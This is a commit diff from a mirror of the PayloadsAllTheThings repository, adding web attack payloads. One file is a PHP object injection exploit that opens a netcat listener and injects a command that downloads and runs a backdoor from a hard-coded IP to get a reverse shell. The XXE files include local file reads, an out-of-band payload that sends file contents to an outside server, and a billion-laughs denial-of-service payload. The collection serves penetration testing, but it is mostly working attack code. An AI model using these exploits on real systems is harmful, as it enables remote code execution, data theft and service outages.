mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
XXE payloads
This commit is contained in:
parent
c874dad3e9
commit
c097f222f4
32
PHP_Serialization/PHP-Serialization-RCE-Exploit.php
Executable file
32
PHP_Serialization/PHP-Serialization-RCE-Exploit.php
Executable file
@ -0,0 +1,32 @@
|
||||
<?php
|
||||
/*
|
||||
PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com
|
||||
|
||||
A simple PoC to exploit PHP Object Injections flaws and gain remote shell access.
|
||||
|
||||
Shouts to @jstnkndy @yappare for the assist!
|
||||
|
||||
NOTE: This requires http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz setup on a remote host with a connect back IP configured
|
||||
*/
|
||||
|
||||
print "==============================================================================\r\n";
|
||||
print "PHP Object Injection PoC Exploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";
|
||||
print "==============================================================================\r\n";
|
||||
print "[+] Generating serialized payload...[OK]\r\n";
|
||||
print "[+] Launching reverse listener...[OK]\r\n";
|
||||
system('gnome-terminal -x sh -c \'nc -lvvp 4242\'');
|
||||
|
||||
class PHPObjectInjection
|
||||
{
|
||||
// CHANGE URL/FILENAME TO MATCH YOUR SETUP
|
||||
public $inject = "system('wget http://92.222.81.2/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
|
||||
}
|
||||
|
||||
$url = 'http://localhost/xvwa/vulnerabilities/php_object_injection/?r='; // CHANGE TO TARGET URL/PARAMETER
|
||||
$url = $url . urlencode(serialize(new PHPObjectInjection));
|
||||
print "[+] Sending exploit...[OK]\r\n";
|
||||
print "[+] Dropping down to interactive shell...[OK]\r\n";
|
||||
print "==============================================================================\r\n";
|
||||
$response = file_get_contents("$url");
|
||||
|
||||
?>
|
18
README.md
18
README.md
@ -1,4 +1,18 @@
|
||||
/!\ Work in Progress : 1%
|
||||
|
||||
# PayloadsAllTheThings
|
||||
A list of every usefull payloads and bypass for Web Application Security
|
||||
|
||||
TODO:
|
||||
* XSS
|
||||
* Upload
|
||||
* Traversal Directory
|
||||
* Tar
|
||||
* SSRF
|
||||
* PHP Serialization
|
||||
* CSV Injection
|
||||
|
||||
To improve:
|
||||
* RCE
|
||||
* SQL injection
|
||||
* XXE
|
||||
|
||||
# /!\ Work in Progress : 1%
|
||||
|
1
XXE/Classic XXE B64 Encoded.xml
Executable file
1
XXE/Classic XXE B64 Encoded.xml
Executable file
@ -0,0 +1 @@
|
||||
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,PCFF...Cg=="> %init; ]><foo/>
|
6
XXE/Classic XXE.xml
Executable file
6
XXE/Classic XXE.xml
Executable file
@ -0,0 +1,6 @@
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE data [
|
||||
<!ELEMENT data (#ANY)>
|
||||
<!ENTITY file SYSTEM "file:///sys/power/image_size">
|
||||
]>
|
||||
<data>&file;</data>
|
8
XXE/Deny Of Service - Billion Laugh Attack
Executable file
8
XXE/Deny Of Service - Billion Laugh Attack
Executable file
@ -0,0 +1,8 @@
|
||||
<!DOCTYPE data [
|
||||
<!ENTITY a0 "dos" >
|
||||
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
|
||||
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
|
||||
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
|
||||
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
|
||||
]>
|
||||
<data>&a4;</data>
|
@ -1,12 +1,48 @@
|
||||
# Title
|
||||
Lorem
|
||||
# XML External Entity
|
||||
An XML External Entity attack is a type of attack against an application that parses XML input
|
||||
|
||||
## Vuln
|
||||
## Exploit
|
||||
|
||||
Classic XXE
|
||||
```
|
||||
Code
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE data [
|
||||
<!ELEMENT data (#ANY)>
|
||||
<!ENTITY file SYSTEM "file:///sys/power/image_size">
|
||||
]>
|
||||
<data>&file;</data>
|
||||
```
|
||||
|
||||
Classic XXE Base64 encoded
|
||||
```
|
||||
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,PCFF...Cg=="> %init; ]><foo/>
|
||||
```
|
||||
|
||||
Deny Of Service - Billion Laugh Attack
|
||||
```
|
||||
<!DOCTYPE data [
|
||||
<!ENTITY a0 "dos" >
|
||||
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
|
||||
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
|
||||
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
|
||||
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
|
||||
]>
|
||||
<data>&a4;</data>
|
||||
```
|
||||
|
||||
|
||||
XXE OOB Attack (Yunusov, 2013)
|
||||
```
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
|
||||
<data>&send;</data>
|
||||
|
||||
File stored on http://publicServer.com/parameterEntity_oob.dtd
|
||||
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
|
||||
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
|
||||
%all;
|
||||
```
|
||||
|
||||
|
||||
## Thanks to
|
||||
* Lorem
|
||||
* Ipsum
|
||||
* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
|
9
XXE/XXE OOB Attack (Yunusov, 2013).xml
Executable file
9
XXE/XXE OOB Attack (Yunusov, 2013).xml
Executable file
@ -0,0 +1,9 @@
|
||||
XXE OOB Attack (Yunusov, 2013)
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
|
||||
<data>&send;</data>
|
||||
|
||||
File stored on http://publicServer.com/parameterEntity_oob.dtd
|
||||
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
|
||||
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
|
||||
%all;
|
Loading…
Reference in New Issue
Block a user